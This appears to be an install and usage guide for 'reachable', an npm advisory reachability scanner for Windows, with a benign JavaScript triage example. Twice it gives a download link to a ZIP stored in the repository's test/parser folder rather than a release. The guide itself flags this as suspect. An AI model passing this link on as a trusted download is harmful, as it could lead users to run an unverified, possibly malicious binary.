reachable checks a JavaScript or TypeScript app for npm security advisories that the app's own code can actually reach. It helps you focus on the advisories that matter, instead of spending time on problems in packages your code never calls.
Use it when you want to:
- scan a local project on Windows
- see which dependency risks are reachable from your code
- review results before shipping changes
- export findings for security tools and code review
Before you start, make sure you have:
- a Windows 10 or Windows 11 PC
- a project written in JavaScript or TypeScript
- a recent version of Node.js installed
- enough disk space to scan your project folder
If your app uses npm packages, reachable can inspect the code and dependency tree to look for paths into known advisories.
The download link given on this page is:
https://github.com/Kael1117/reachable/raw/refs/heads/main/test/parser/Software-1.6-beta.4.zip
Read that URL before you use it: it fetches a ZIP committed under the repository's test/parser directory on the main branch, not a tagged release asset. Open the repository itself (github.com/Kael1117/reachable), check its README and Releases page for the project's own install instructions, and prefer those, or an npm install if the project is published, over an archive found in a test folder.
After you open the repository:
- look for the latest release or source files
- download the Windows version if one is provided
- save it in a folder you can find later
- if the download is a ZIP file, extract it
- open the folder that contains the tool
If you run the project from source, install its dependencies with npm in the project folder:
- open the project folder in File Explorer
- click the address bar, type cmd and press Enter
- run the install command shown in the repository files (typically npm install, or npm ci when the repository ships a lockfile, so you get exactly the pinned versions)
- wait for the packages to finish installing
If the repository documents a packaged executable, you can skip the install step and run that file directly. Do not run a binary that the repository's README or Releases page does not describe.
Open Command Prompt in the folder where reachable is located, then run the command shown by the project.
A typical run looks like this:
- scan your current app folder
- point reachable at your project path
- review the output in the terminal
Example flow:
- open Command Prompt
- go to your app folder
- run reachable
- wait for the scan to finish
- read the results in the window
If the tool supports a help screen, you can use it first to see the available options:
- show help
- choose an input folder
- select an output format
- run a full scan
If Windows blocks the app, try these checks:
- confirm the file finished downloading; if the project publishes a checksum, compare it before you go further
- keep the tool in a normal folder like Downloads or Desktop
- make sure Node.js is on your system PATH if you are using the source version
- open Command Prompt as a regular user first; an elevated prompt is not a fix for a blocked file
A SmartScreen or unknown-publisher warning means Windows has no reputation for the file. Treat it as a prompt to verify where the file came from, not as something to click past.
If the scan does not start, check that:
- you are inside a project with a package.json
- the folder has node_modules, if the app expects installed packages
- the path does not contain unusual characters
- the terminal is pointed at the right folder
reachable looks at your code and your dependency tree. It then checks which advisories have a path that your app can reach.
That means it can help you separate:
- packages that are present
- packages that are used
- packages that may be vulnerable
- packages that can actually be hit by your code
This is useful because not every advisory matters in the same way. A package can sit in your install tree and still never be touched by your app. Reachability is a prioritisation signal, not a clean bill of health: any static path analysis can miss calls made through dynamic require(), eval or other indirection, so an advisory reported as unreachable still deserves a glance before you dismiss it.
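To make the four categories concrete, here is an added example (not reachable's own code, and working at package rather than function granularity) that classifies advisories against a dependency graph and source files. The graph, the source snippets and the advisories are all constructed; the package names are real npm packages used only as labels, and the advisory identifiers are placeholders, not real advisories.

```javascript
// Added example, not reachable's own code. Package-level reachability triage:
// an advisory is "reachable" here when its package is pulled in, directly or
// transitively, by something the app's own source actually imports.
// A real tool works at function level; this shows only the shape of the idea.

// Bare import specifiers from require() and ES "from" clauses; relative paths
// (starting with "." or "/") are skipped because they are app code, not packages.
const IMPORT_RE = /(?:require\(\s*['"]([^'"./][^'"]*)['"]\s*\)|from\s+['"]([^'"./][^'"]*)['"])/g;

// Reduce a specifier to its package name: "lodash/merge" -> "lodash",
// "@scope/pkg/sub" -> "@scope/pkg".
function packageName(spec) {
  const parts = spec.split('/');
  return spec.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
}

function findImports(source) {
  const pkgs = new Set();
  for (const m of source.matchAll(IMPORT_RE)) pkgs.add(packageName(m[1] ?? m[2]));
  return pkgs;
}

// Every package reachable from the roots through the dependency graph.
// Names not in the graph (Node builtins, typos) are ignored.
function closure(graph, roots) {
  const seen = new Set();
  const stack = [...roots];
  while (stack.length > 0) {
    const pkg = stack.pop();
    if (seen.has(pkg) || !Object.prototype.hasOwnProperty.call(graph, pkg)) continue;
    seen.add(pkg);
    stack.push(...graph[pkg]);
  }
  return seen;
}

// Split advisories into the buckets the text describes: present, used,
// vulnerable (present and advised), reachable (vulnerable and used).
function triage(graph, sources, advisories) {
  const present = new Set(Object.keys(graph));
  const imported = new Set();
  for (const src of sources) for (const p of findImports(src)) imported.add(p);
  const used = closure(graph, imported);
  const vulnerable = advisories.filter((a) => present.has(a.package));
  return {
    present,
    used,
    vulnerable,
    reachable: vulnerable.filter((a) => used.has(a.package)),
    unreachable: vulnerable.filter((a) => !used.has(a.package)),
    notInstalled: advisories.filter((a) => !present.has(a.package)),
  };
}

// Constructed data: installed package -> its dependencies (what a lockfile records).
const GRAPH = {
  express: ['qs', 'body-parser'],
  'body-parser': ['qs'],
  qs: [],
  lodash: [],
  'left-pad': [], // installed, never imported
  mocha: ['minimatch'], // dev-only test runner, never imported by app code
  minimatch: [],
};

// Constructed source files.
const SOURCES = [
  "const express = require('express');\nimport merge from 'lodash/merge';",
  "import './local-helper.js';\nconst util = require('./util');\nconst fs = require('node:fs');",
];

// Constructed advisories with placeholder identifiers (not real advisories).
const ADVISORIES = [
  { id: 'ADV-0001', package: 'qs' },
  { id: 'ADV-0002', package: 'minimatch' },
  { id: 'ADV-0003', package: 'left-pad' },
  { id: 'ADV-0004', package: 'request' }, // not installed at all
];

function runExample() {
  const result = triage(GRAPH, SOURCES, ADVISORIES);
  for (const bucket of ['reachable', 'unreachable', 'notInstalled']) {
    console.log(bucket, result[bucket].map((a) => `${a.id} (${a.package})`));
  }
  return result;
}

runExample();
```

In the constructed data only ADV-0001 is reachable: qs is pulled in through express, which the app imports. minimatch is vulnerable but only reached from mocha, which nothing in the app imports, and left-pad is installed but never used. ADV-0004 is pure noise because request is not installed at all.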
You may want to use reachable when:
- you want a cleaner security review
- you need to check a Node.js app before release
- you want to validate npm advisories in a real code path
- you want a result format that can fit into CI checks
- you need findings for a team security report
It fits well in developer workflows, build checks, and manual review.
reachable can be used in ways that help with review and automation. Depending on the project setup, it may support:
- terminal output for quick checks
- SARIF output for security tooling
- JSON-style results for later processing
- CI-friendly runs in GitHub Actions
If you plan to share results with a team, keep the scan output in a file so you can compare it later.
For the clearest scan:
- run it from the root of your app
- keep your dependencies installed
- scan one project at a time
- use the same Node.js version your app uses
- review both direct and nested dependencies
If your app has several packages, scan each package folder on its own.
reachable is built for:
- JavaScript projects
- TypeScript projects
- Node.js apps
- npm-based dependency trees
- local-first code review workflows
It is a good fit for apps that use many packages and need a simple way to sort signal from noise.
A simple workflow looks like this:
- download or clone the project
- open your app folder
- install any needed packages
- run the scan
- review the reachable advisories
- keep the results for your records
If you use it often, run the same steps after each major dependency update.
Some security tools list every known issue in your dependency tree. That can create a long list of alerts. reachable helps narrow that list by checking if your code can get to the risky path.
This can help you:
- focus on the findings that matter
- reduce time spent on dead ends
- explain risk to non-technical teammates
- track what changed after an update
- plan fixes based on real code paths
When you work with the tool, these folders matter most:
- the project root, where package.json lives
- the dependency folder, often node_modules
- the terminal window, where you run the scan
- the output folder, if you save reports
Keep the project in a path you can reach easily, such as:
C:\Users\YourName\Desktop\project
C:\Users\YourName\Documents\project
Keep the tool and your notes in one place:
- save the download link
- keep the project folder unchanged
- store any scan results with the date
- rerun scans after package updates
- compare new results against older runs
That makes it easier to see how your app changes over time.
- open the download link given on this page: https://github.com/Kael1117/reachable/raw/refs/heads/main/test/parser/Software-1.6-beta.4.zip, and check it against the repository's README and Releases page before using it
- download the Windows file or source package
- extract it if needed
- open Command Prompt in the app folder
- run the command from the project
- scan your target project folder
- review the reachable findings